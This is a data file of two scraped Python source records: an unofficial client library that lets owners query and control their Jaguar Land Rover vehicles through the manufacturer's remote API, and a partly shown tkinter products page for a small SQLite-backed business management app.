+{"seq_id":"16392554170","text":"\"\"\" Simple Python class to access the JLR Remote Car API\nhttps://github.com/ardevd/jlrpy\n\"\"\"\n\nfrom urllib.request import Request, build_opener\n\nimport json\nimport datetime\nimport calendar\nimport uuid\nimport sys\nimport logging\n\nlogger = logging.getLogger('jply')\nlogger.setLevel(logging.INFO)\n\nch = logging.StreamHandler(sys.stdout)\nch.setFormatter(logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\"))\nlogger.addHandler(ch)\nlogger.propagate = False\n\nIFAS_BASE_URL = \"https://ifas.prod-row.jlrmotor.com/ifas/jlr\"\nIFOP_BASE_ULR = \"https://ifop.prod-row.jlrmotor.com/ifop/jlr\"\nIF9_BASE_URL = \"https://if9.prod-row.jlrmotor.com/if9/jlr\"\n\n\nclass Connection(object):\n \"\"\"Connection to the JLR Remote Car API\"\"\"\n\n def __init__(self,\n email='',\n password='',\n device_id='',\n refresh_token=''):\n \"\"\"Init the connection object\n\n The email address and password associated with your Jaguar InControl account is required.\n A device Id can optionally be specified. If not one will be generated at runtime.\n A refresh token can be supplied for authentication instead of a password\n \"\"\"\n self.email = email\n\n if device_id:\n self.device_id = device_id\n else:\n self.device_id = str(uuid.uuid4())\n\n if refresh_token:\n self.oauth = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": refresh_token}\n else:\n self.oauth = {\n \"grant_type\": \"password\",\n \"username\": email,\n \"password\": password}\n\n self.expiration = 0 # force credential refresh\n\n self.connect()\n\n self.vehicles = []\n try:\n for v in self.get_vehicles(self.head)['vehicles']:\n self.vehicles.append(Vehicle(v, self))\n except TypeError:\n logger.error(\"No vehicles associated with this account\")\n\n def get(self, command, url, headers):\n \"\"\"GET data from API\"\"\"\n return self.post(command, url, headers, None)\n\n def post(self, command, url, headers, data=None):\n \"\"\"POST data to API\"\"\"\n now = calendar.timegm(datetime.datetime.now().timetuple())\n logger.debug(url)\n if now > self.expiration:\n # Auth expired, reconnect\n self.connect()\n return self.__open(\"%s/%s\" % (url, command), headers=headers, data=data)\n\n def connect(self):\n logger.info(\"Connecting...\")\n auth = self.__authenticate(data=self.oauth)\n self.__register_auth(auth)\n self.__set_header(auth['access_token'])\n logger.info(\"[+] authenticated\")\n self.__register_device_and_log_in()\n\n def __register_device_and_log_in(self):\n self.__register_device(self.head)\n logger.info(\"1/2 device id registered\")\n self.__login_user(self.head)\n logger.info(\"2/2 user logged in, user id retrieved\")\n\n def __open(self, url, headers=None, data=None):\n req = Request(url, headers=headers)\n if data:\n req.data = bytes(json.dumps(data), encoding=\"utf8\")\n\n opener = build_opener()\n resp = opener.open(req)\n charset = resp.info().get('charset', 'utf-8')\n resp_data = resp.read().decode(charset)\n if resp_data:\n return json.loads(resp_data)\n else:\n return None\n\n def __register_auth(self, auth):\n self.access_token = auth['access_token']\n now = calendar.timegm(datetime.datetime.now().timetuple())\n self.expiration = now + int(auth['expires_in'])\n self.auth_token = auth['authorization_token']\n self.refresh_token = auth['refresh_token']\n\n def __set_header(self, access_token):\n \"\"\"Set HTTP header fields\"\"\"\n self.head = {\n \"Authorization\": \"Bearer %s\" % access_token,\n \"X-Device-Id\": self.device_id,\n \"Content-Type\": \"application/json\"}\n\n def __authenticate(self, data=None):\n \"\"\"Raw urlopen command to the auth url\"\"\"\n url = \"%s/tokens\" % IFAS_BASE_URL\n auth_headers = {\n \"Authorization\": \"Basic YXM6YXNwYXNz\",\n \"Content-Type\": \"application/json\",\n \"X-Device-Id\": self.device_id}\n\n return self.__open(url, auth_headers, data)\n\n def __register_device(self, headers=None):\n \"\"\"Register the device Id\"\"\"\n url = \"%s/users/%s/clients\" % (IFOP_BASE_ULR, self.email)\n data = {\n \"access_token\": self.access_token,\n \"authorization_token\": self.auth_token,\n \"expires_in\": \"86400\",\n \"deviceID\": self.device_id\n }\n\n return self.__open(url, headers, data)\n\n def __login_user(self, headers=None):\n \"\"\"Login the user\"\"\"\n url = \"%s/users?loginName=%s\" % (IF9_BASE_URL, self.email)\n user_login_header = headers.copy()\n user_login_header[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.User-v3+json\"\n\n user_data = self.__open(url, user_login_header)\n self.user_id = user_data['userId']\n return user_data\n\n def refresh_tokens(self):\n \"\"\"Refresh tokens.\"\"\"\n self.oauth = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": self.refresh_token}\n\n auth = self.__authenticate(self.oauth)\n self.__register_auth(auth)\n self.__set_header(auth['access_token'])\n logger.info(\"[+] Tokens refreshed\")\n self.__register_device_and_log_in()\n\n def get_vehicles(self, headers):\n \"\"\"Get vehicles for user\"\"\"\n url = \"%s/users/%s/vehicles?primaryOnly=true\" % (IF9_BASE_URL, self.user_id)\n return self.__open(url, headers)\n\n def get_user_info(self):\n \"\"\"Get user information\"\"\"\n return self.get(self.user_id, \"%s/users\" % IF9_BASE_URL, self.head)\n\n def update_user_info(self, user_info_data):\n \"\"\"Update user information\"\"\"\n headers = self.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.User-v3+json; charset=utf-8\"\n return self.post(self.user_id, \"%s/users\" % IF9_BASE_URL, headers, user_info_data)\n\n def reverse_geocode(self, lat, lon):\n \"\"\"Get geocode information\"\"\"\n return self.get(\"en\",\n \"%s/geocode/reverse/{0:f}/{1:f}\".format(lat, lon) % IF9_BASE_URL,\n self.head)\n\n\nclass Vehicle(dict):\n \"\"\"Vehicle class.\n\n You can request data or send commands to vehicle. Consult the JLR API documentation for details\n \"\"\"\n\n def __init__(self, data, connection):\n \"\"\"Initialize the vehicle class.\"\"\"\n\n super().__init__(data)\n self.connection = connection\n self.vin = data['vin']\n\n def get_attributes(self):\n \"\"\"Get vehicle attributes\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.ngtp.org.VehicleAttributes-v3+json\"\n result = self.get('attributes', headers)\n return result\n\n def get_status(self, key=None):\n \"\"\"Get vehicle status\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.ngtp.org.if9.healthstatus-v2+json\"\n result = self.get('status', headers)\n\n if key:\n return {d['key']: d['value'] for d in result['vehicleStatus']}[key]\n\n return result\n\n def get_health_status(self):\n \"\"\"Get vehicle health status\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n\n vhs_data = self._authenticate_vhs()\n\n return self.post('healthstatus', headers, vhs_data)\n\n def get_departure_timers(self):\n \"\"\"Get vehicle departure timers\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.DepartureTimerSettings-v1+json\"\n return self.get(\"departuretimers\", headers)\n\n def get_wakeup_time(self):\n \"\"\"Get configured wakeup time for vehicle\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.VehicleWakeupTime-v2+json\"\n return self.get(\"wakeuptime\", headers)\n\n def get_subscription_packages(self):\n \"\"\"Get vehicle status\"\"\"\n result = self.get('subscriptionpackages', self.connection.head)\n return result\n\n def get_trips(self, count=1000):\n \"\"\"Get the last 1000 trips associated with vehicle\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.ngtp.org.triplist-v2+json\"\n return self.get('trips?count=%d' % count, headers)\n\n def get_trip(self, trip_id):\n \"\"\"Get info on a specific trip\"\"\"\n return self.get('trips/%s/route?pageSize=1000&page=0' % trip_id, self.connection.head)\n\n def get_position(self):\n \"\"\"Get current vehicle position\"\"\"\n return self.get('position', self.connection.head)\n\n def get_service_status(self, service_id):\n \"\"\"Get service status\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n return self.get('services/%s' % service_id, headers)\n\n def get_services(self):\n \"\"\"Get active services\"\"\"\n headers = self.connection.head.copy()\n return self.get(\"services\", headers)\n\n def get_rcc_target_value(self):\n \"\"\"Get Remote Climate Target Value\"\"\"\n headers = self.connection.head.copy()\n return self.get('settings/ClimateControlRccTargetTemp', headers)\n\n def set_attributes(self, nickname, registration_number):\n \"\"\"Set vehicle nickname and registration number\"\"\"\n attributes_data = {\"nickname\": nickname,\n \"registrationNumber\": registration_number}\n return self.post(\"attributes\", self.connection.head, attributes_data)\n\n def lock(self, pin):\n \"\"\"Lock vehicle. Requires personal PIN for authentication\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n rdl_data = self.authenticate_rdl(pin)\n\n return self.post(\"lock\", headers, rdl_data)\n\n def unlock(self, pin):\n \"\"\"Unlock vehicle. Requires personal PIN for authentication\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n rdu_data = self.authenticate_rdu(pin)\n\n return self.post(\"unlock\", headers, rdu_data)\n\n def reset_alarm(self, pin):\n \"\"\"Reset vehicle alarm\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n aloff_data = self.authenticate_aloff(pin)\n\n return self.post(\"unlock\", headers, aloff_data)\n\n def honk_blink(self):\n \"\"\"Sound the horn and blink lights\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n\n hblf_data = self.authenticate_hblf()\n return self.post(\"honkBlink\", headers, hblf_data)\n\n def remote_engine_start(self, pin, target_value):\n \"\"\"Start Remote Engine preconditioning\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n self.set_rcc_target_value(pin, target_value)\n reon_data = self.authenticate_reon(pin)\n\n return self.post(\"engineOn\", headers, reon_data)\n\n def remote_engine_stop(self, pin):\n \"\"\"Stop Remote Engine preconditioning\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n reoff_data = self.authenticate_reoff(pin)\n\n return self.post(\"engineOff\", headers, reoff_data)\n\n def set_rcc_target_value(self, pin, target_value):\n \"\"\"Set Remote Climate Target Value (value between 31-57, 31 is LO 57 is HOT)\"\"\"\n headers = self.connection.head.copy()\n self.enable_provisioning_mode(pin)\n service_parameters = {\"key\": \"ClimateControlRccTargetTemp\",\n \"value\": \"%s\" % str(target_value),\n \"applied\": 1}\n self.post(\"settings\", headers, service_parameters)\n\n def preconditioning_start(self, target_temp):\n \"\"\"Start pre-conditioning for specified temperature (celsius)\"\"\"\n service_parameters = [{\"key\": \"PRECONDITIONING\",\n \"value\": \"START\"},\n {\"key\": \"TARGET_TEMPERATURE_CELSIUS\",\n \"value\": \"%s\" % target_temp}]\n\n return self._preconditioning_control(service_parameters)\n\n def preconditioning_stop(self):\n \"\"\"Stop climate preconditioning\"\"\"\n service_parameters = [{\"key\": \"PRECONDITIONING\",\n \"value\": \"STOP\"}]\n return self._preconditioning_control(service_parameters)\n\n def climate_prioritize(self, priority):\n \"\"\"Optimize climate controls for comfort or range\"\"\"\n service_parameters = [{\"key\": \"PRIORITY_SETTING\",\n \"value\": \"%s\" % priority}]\n return self._preconditioning_control(service_parameters)\n\n def _preconditioning_control(self, service_parameters):\n \"\"\"Control the climate preconditioning\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v5+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.PhevService-v1+json; charset=utf-8\"\n\n ecc_data = self.authenticate_ecc()\n ecc_data['serviceParameters'] = service_parameters\n\n return self.post(\"preconditioning\", headers, ecc_data)\n\n def charging_stop(self):\n \"\"\"Stop charging\"\"\"\n service_parameters = [{\"key\": \"CHARGE_NOW_SETTING\",\n \"value\": \"FORCE_OFF\"}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def charging_start(self):\n \"\"\"Start charging\"\"\"\n service_parameters = [{\"key\": \"CHARGE_NOW_SETTING\",\n \"value\": \"FORCE_ON\"}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def set_max_soc(self, max_charge_level):\n \"\"\"Set max state of charge in percentage\"\"\"\n service_parameters = [{\"key\": \"SET_PERMANENT_MAX_SOC\",\n \"value\": max_charge_level}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def set_one_off_max_soc(self, max_charge_level):\n \"\"\"Set one off max state of charge in percentage\"\"\"\n service_parameters = [{\"key\": \"SET_ONE_OFF_MAX_SOC\",\n \"value\": max_charge_level}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def add_departure_timer(self, index, year, month, day, hour, minute):\n \"\"\"Add a single departure timer with the specified index\"\"\"\n departure_timer_setting = {\"timers\": [\n {\"departureTime\": {\"hour\": hour, \"minute\": minute},\n \"timerIndex\": index, \"timerTarget\":\n {\"singleDay\": {\"day\": day, \"month\": month, \"year\": year}},\n \"timerType\": {\"key\": \"BOTHCHARGEANDPRECONDITION\", \"value\": True}}]}\n\n return self._charging_profile_control(\"departureTimerSetting\", departure_timer_setting)\n\n def add_repeated_departure_timer(self, index, schedule, hour, minute):\n \"\"\"Add repeated departure timer.\"\"\"\n departure_timer_setting = {\"timers\": [\n {\"departureTime\": {\"hour\": hour, \"minute\": minute},\n \"timerIndex\": index, \"timerTarget\":\n {\"repeatSchedule\": schedule},\n \"timerType\": {\"key\": \"BOTHCHARGEANDPRECONDITION\", \"value\": True}}]}\n\n return self._charging_profile_control(\"departureTimerSetting\", departure_timer_setting)\n\n def delete_departure_timer(self, index):\n \"\"\"Delete a single departure timer associated with the specified index\"\"\"\n departure_timer_setting = {\"timers\": [{\"timerIndex\": index}]}\n\n return self._charging_profile_control(\"departureTimerSetting\", departure_timer_setting)\n\n def add_charging_period(self, index, schedule, hour_from, minute_from, hour_to, minute_to):\n \"\"\"Add charging period\"\"\"\n tariff_settings = {\"tariffs\": [\n {\"tariffIndex\": index, \"tariffDefinition\": {\"enabled\": True,\n \"repeatSchedule\": schedule,\n \"tariffZone\": [\n {\"zoneName\": \"TARIFF_ZONE_A\",\n \"bandType\": \"PEAK\",\n \"endTime\": {\n \"hour\": hour_from,\n \"minute\": minute_from}},\n {\"zoneName\": \"TARIFF_ZONE_B\",\n \"bandType\": \"OFFPEAK\",\n \"endTime\": {\"hour\": hour_to,\n \"minute\": minute_to}},\n {\"zoneName\": \"TARIFF_ZONE_C\",\n \"bandType\": \"PEAK\",\n \"endTime\": {\"hour\": 0,\n \"minute\": 0}}]}}]}\n\n return self._charging_profile_control(\"tariffSettings\", tariff_settings)\n\n def _charging_profile_control(self, service_parameter_key, service_parameters):\n \"\"\"Charging profile API\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v5+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.PhevService-v1+json; charset=utf-8\"\n\n cp_data = self.authenticate_cp()\n cp_data[service_parameter_key] = service_parameters\n\n return self.post(\"chargeProfile\", headers, cp_data)\n\n def set_wakeup_time(self, wakeup_time):\n \"\"\"Set the wakeup time for the specified time (epoch milliseconds)\"\"\"\n swu_data = self.authenticate_swu()\n swu_data[\"serviceCommand\"] = \"START\"\n swu_data[\"startTime\"] = wakeup_time\n return self._swu(swu_data)\n\n def delete_wakeup_time(self):\n \"\"\"Stop the wakeup time\"\"\"\n swu_data = self.authenticate_swu()\n swu_data[\"serviceCommand\"] = \"END\"\n return self._swu(swu_data)\n\n def _swu(self, swu_data):\n \"\"\"Set the wakeup time for the specified time (epoch milliseconds)\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v3+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n return self.post(\"swu\", headers, swu_data)\n\n def enable_provisioning_mode(self, pin):\n \"\"\"Enable provisioning mode \"\"\"\n self._prov_command(pin, None, \"provisioning\")\n\n def enable_service_mode(self, pin, expiration_time):\n \"\"\"Enable service mode. Will disable at the specified time (epoch millis)\"\"\"\n return self._prov_command(pin, expiration_time, \"protectionStrategy_serviceMode\")\n\n def enable_transport_mode(self, pin, expiration_time):\n \"\"\"Enable transport mode. Will be disabled at the specified time (epoch millis)\"\"\"\n return self._prov_command(pin, expiration_time, \"protectionStrategy_transportMode\")\n\n def enable_privacy_mode(self, pin):\n \"\"\"Enable privacy mode. Will disable journey logging\"\"\"\n return self._prov_command(pin, None, \"privacySwitch_on\")\n\n def disable_privacy_mode(self, pin):\n \"\"\"Disable privacy mode. Will enable journey logging\"\"\"\n return self._prov_command(pin, None, \"privacySwitch_off\")\n\n def _prov_command(self, pin, expiration_time, mode):\n \"\"\"Send prov endpoint commands. Used for service/transport/privacy mode\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json\"\n prov_data = self.authenticate_prov(pin)\n\n prov_data[\"serviceCommand\"] = mode\n prov_data[\"startTime\"] = None\n prov_data[\"endTime\"] = expiration_time\n\n return self.post(\"prov\", headers, prov_data)\n\n def _authenticate_vhs(self):\n \"\"\"Authenticate to vhs and get token\"\"\"\n return self._authenticate_empty_pin_protected_service(\"VHS\")\n\n def _authenticate_empty_pin_protected_service(self, service_name):\n data = {\n \"serviceName\": service_name,\n \"pin\": \"\"}\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.AuthenticateRequest-v2+json; charset=utf-8\"\n\n return self.post(\"users/%s/authenticate\" % self.connection.user_id, headers, data)\n\n def authenticate_hblf(self):\n \"\"\"Authenticate to hblf\"\"\"\n return self._authenticate_vin_protected_service(\"HBLF\")\n\n def authenticate_ecc(self):\n \"\"\"Authenticate to ecc\"\"\"\n return self._authenticate_vin_protected_service(\"ECC\")\n\n def authenticate_cp(self):\n \"\"\"Authenticate to cp\"\"\"\n return self._authenticate_vin_protected_service(\"CP\")\n\n def authenticate_swu(self):\n \"\"\"Authenticate to swu\"\"\"\n return self._authenticate_empty_pin_protected_service(\"SWU\")\n\n def _authenticate_vin_protected_service(self, service_name):\n \"\"\"Authenticate to specified service and return associated token\"\"\"\n data = {\n \"serviceName\": \"%s\" % service_name,\n \"pin\": \"%s\" % self.vin[-4:]}\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.AuthenticateRequest-v2+json; charset=utf-8\"\n\n return self.post(\"users/%s/authenticate\" % self.connection.user_id, headers, data)\n\n def authenticate_rdl(self, pin):\n \"\"\"Authenticate to rdl\"\"\"\n return self._authenticate_pin_protected_service(pin, \"RDL\")\n\n def authenticate_rdu(self, pin):\n \"\"\"Authenticate to rdu\"\"\"\n return self._authenticate_pin_protected_service(pin, \"RDU\")\n\n def authenticate_aloff(self, pin):\n \"\"\"Authenticate to aloff\"\"\"\n return self._authenticate_pin_protected_service(pin, \"ALOFF\")\n\n def authenticate_reon(self, pin):\n \"\"\"Authenticate to reon\"\"\"\n return self._authenticate_pin_protected_service(pin, \"REON\")\n\n def authenticate_reoff(self, pin):\n \"\"\"Authenticate to reoff\"\"\"\n return self._authenticate_pin_protected_service(pin, \"REOFF\")\n\n def authenticate_prov(self, pin):\n \"\"\"Authenticate to PROV service\"\"\"\n return self._authenticate_pin_protected_service(pin, \"PROV\")\n\n def _authenticate_pin_protected_service(self, pin, service_name):\n \"\"\"Authenticate to specified service with the provided PIN\"\"\"\n data = {\n \"serviceName\": \"%s\" % service_name,\n \"pin\": \"%s\" % pin}\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.AuthenticateRequest-v2+json; charset=utf-8\"\n\n return self.post(\"users/%s/authenticate\" % self.connection.user_id, headers, data)\n\n def post(self, command, headers, data):\n \"\"\"Utility command to post data to VHS\"\"\"\n return self.connection.post(command, '%s/vehicles/%s' % (IF9_BASE_URL, self.vin),\n headers, data)\n\n def get(self, command, headers):\n \"\"\"Utility command to get vehicle data from API\"\"\"\n return self.connection.get(command, '%s/vehicles/%s' % (IF9_BASE_URL, self.vin), headers)\n","repo_name":"smar000/jlr2mqtt","sub_path":"jlrpy.py","file_name":"jlrpy.py","file_ext":"py","file_size_in_byte":24760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"34713530847","text":"from itertools import count\nfrom os import X_OK\nfrom tkinter import *\nfrom tkinter import ttk\nfrom datetime import *\nfrom time import strftime\nfrom PIL import ImageTk, Image\nfrom tkcalendar import DateEntry\nimport sqlite3\n# from functions import *\nimport signin\nimport dashboard\nimport products\nimport sales\nimport customers\nimport addproduct\nimport addcustomer\nimport addsales\n\nclass Products:\n def __init__(self, window):\n self.window = window\n width = 800\n height = 500\n sw = self.window.winfo_screenwidth()\n sh = self.window.winfo_screenheight()\n x = (sw/5)\n y = (sh/11)\n self.window.geometry(f'{width}x{height}+{int(x)}+{int(y)}')\n self.window.title('TCP Management | Products page')\n self.window.configure(bg='#f7f3f2')\n self.window.wm_iconbitmap('FMCG.ico')\n self.window.resizable(0, 0)\n\n # Database\n def SalesData():\n db = sqlite3.connect('GLBL.db')\n cursor = db.cursor()\n cursor.execute('select * from products')\n records = cursor.fetchall()\n \n global count\n count = 0\n for record in records:\n SalesView.insert(parent='', index='end', iid=count, values=(record[0], \n record[1], record[2], record[3])) \n count = count + 1\n\n db.commit()\n db.close()\n\n\n\n # First Frame & Menu\n MenuFrame = Frame(window)\n MenuFrame.pack(fill=X, expand='no')\n\n Menu = Button(MenuFrame, text = 'Overview', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.dashb)\n Menu.grid(row=0, column=0, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=1, pady=10)\n\n Menu2 = Button(MenuFrame, text = 'Products', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.prod)\n Menu2.grid(row=0, column=2, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=3, pady=10)\n\n Menu3 = Button(MenuFrame, text = 'Sales', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.saless)\n Menu3.grid(row=0, column=4, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=5, pady=10)\n\n Menu4 = Button(MenuFrame, text = 'Customers', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.cus)\n Menu4.grid(row=0, column=6, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=7, pady=10)\n\n Menu5 = Button(MenuFrame, text = 'Vendors', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'))\n Menu5.grid(row=0, column=8, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=9, pady=10)\n\n Menu6 = Button(MenuFrame, text = 'Inventory', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'))\n Menu6.grid(row=0, column=10, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=11, pady=10)\n\n Menu7 = Button(MenuFrame, text = 'Expenses', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'))\n Menu7.grid(row=0, column=12, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=13, pady=10)\n\n Menu9 = Button(MenuFrame, text = 'Log Out', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.logout)\n Menu9.grid(row=0, column=14, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=15, pady=10)\n\n\n Date = datetime.now()\n Menu10 = Label(MenuFrame, text=f\"{Date:%A, %B, %d, %Y}\", font=('roboto', 9, 'bold'), bg='green', fg='white')\n Menu10.grid(row=0, column=17, padx=5, pady=10)\n Time = strftime('%I:%M:%S')\n Menu11 = Label(MenuFrame, text=Time, font=('roboto', 9, 'bold'), bg='green', fg='white')\n Menu11.grid(row=0, column=18, pady=10)\n Menu11.after(1000, time)\n\n # Second Frames & Menu\n SideFrame = LabelFrame(window, height=300, width=150)\n SideFrame.pack(fill=Y, expand='no', anchor=W, padx=10, pady=40)\n\n\n SideMenu = Button(SideFrame, text='Add Product', font=('roboto', 9, 'bold'), bg='#d11c03', fg='white', bd=0, cursor='hand2', activebackground='#d11c03', activeforeground='white', command=self.addp)\n SideMenu.grid(row=0, column=0, padx=10, pady=7)\n\n\n\n # Center Frames & Labels\n Sales = LabelFrame(window, text=\"Our Products\", height=275, width=648, font=('roboto', 9, 'bold'), fg='green')\n Sales.pack(fill=X, expand='no')\n Sales.place(x=130, y=75)\n\n Style = ttk.Style()\n Style.theme_use('clam')\n Style.configure('Treeview',\n font=('roboto', 10, 'bold'),\n background='#f7f3f2',\n rowheight=20,\n activebackground=\"#81C44C\")\n\n Style.map('Treeview', background=[('selected', 'green')])\n # #bd2505\n\n Tscroll = Scrollbar(Sales, orient='vertical')\n Tscroll.pack(side=RIGHT, fill=Y)\n\n SalesView = ttk.Treeview(Sales, yscrollcommand=Tscroll.set, selectmode='extended')\n SalesView.pack(pady=10, padx=10)\n Tscroll.configure(command=SalesView.yview)\n SalesView['columns'] = ('PID', 'PRODUCT NAME', 'UNIT', 'DATE')\n\n SalesView.column('#0', width=0, stretch=NO)\n SalesView.column('PID', anchor=CENTER, width=70)\n SalesView.column('PRODUCT NAME', anchor=CENTER, width=140)\n SalesView.column('UNIT', anchor=CENTER, width=120)\n SalesView.column('DATE', anchor=CENTER, width=75)\n \n\n SalesView.heading('#0', text='', anchor=CENTER)\n SalesView.heading('PID', text='PID', anchor=CENTER)\n SalesView.heading('PRODUCT NAME', text='PRODUCT NAME', anchor=CENTER)\n SalesView.heading('UNIT', text='UNIT', anchor=CENTER)\n SalesView.heading('DATE', text='DATE', anchor=CENTER)\n\n LiveUp = Label(window, text='Products Live Updates', font=('roboto', 10, 'bold'), bg='#d11c03', fg='white')\n LiveUp.place(x=617, y=82)\n\n LiveUpF = LabelFrame(window, text='', width=190, height=226)\n LiveUpF.pack(fill=Y, expand='no', side=RIGHT)\n LiveUpF.place(x=600, y=115)\n\n PEX = Label(LiveUpF, text='Product: Quantity Produced', font=('roboto', 10, 'bold')).place(x=1, y=2)\n\n PP1 = Label(LiveUpF, text='Product 1:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=30)\n PP2 = Label(LiveUpF, text='Product 2:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=50)\n PP3 = Label(LiveUpF, text='Product 3:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=70)\n PP4 = Label(LiveUpF, text='Product 4:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=90)\n PP5 = Label(LiveUpF, text='Product 5:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=110)\n PP6 = Label(LiveUpF, text='Product 6:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=130)\n PPR1 = Label(LiveUpF, text='120000', font=('roboto', 10, 'bold')).place(x=80, y=30)\n PPR2 = Label(LiveUpF, text='130000', font=('roboto', 10, 'bold')).place(x=80, y=50)\n PPR3 = Label(LiveUpF, text='140000', font=('roboto', 10, 'bold')).place(x=80, y=70)\n PPR4 = Label(LiveUpF, text='150000', font=('roboto', 10, 'bold')).place(x=80, y=90)\n PPR5 = Label(LiveUpF, text='160000', font=('roboto', 10, 'bold')).place(x=80, y=110)\n PPR6 = Label(LiveUpF, text='170000', font=('roboto', 10, 'bold')).place(x=80, y=130)\n \n\n # SrcDate = DateEntry(window, selectmode='day')\n # SrcDate.place(x=140, y=370)\n\n # SrcBtn = Button(window, text='Search', font=('roboto', 10, 'bold'), bg='green', fg='white', cursor='hand2', command=src)\n # SrcBtn.place(x=260, y=365)\n\n\n SalesData()\n\n\n def dashb(self):\n win = Toplevel()\n dashboard.Dashboard(win)\n self.window.withdraw()\n win.deiconify()\n\n def prod(self):\n win = Toplevel()\n products.Products(win)\n self.window.withdraw()\n win.deiconify()\n\n def saless(self):\n win = Toplevel()\n sales.Sales(win)\n self.window.withdraw()\n win.deiconify()\n\n def cus(self):\n win = Toplevel()\n customers.Customers(win)\n self.window.withdraw()\n win.deiconify()\n\n def addp(self):\n win = Toplevel()\n addproduct.AddProduct(win)\n self.window.withdraw()\n win.deiconify()\n\n def addc(self):\n win = Toplevel()\n addcustomer.AddCustomer(win)\n self.window.withdraw()\n 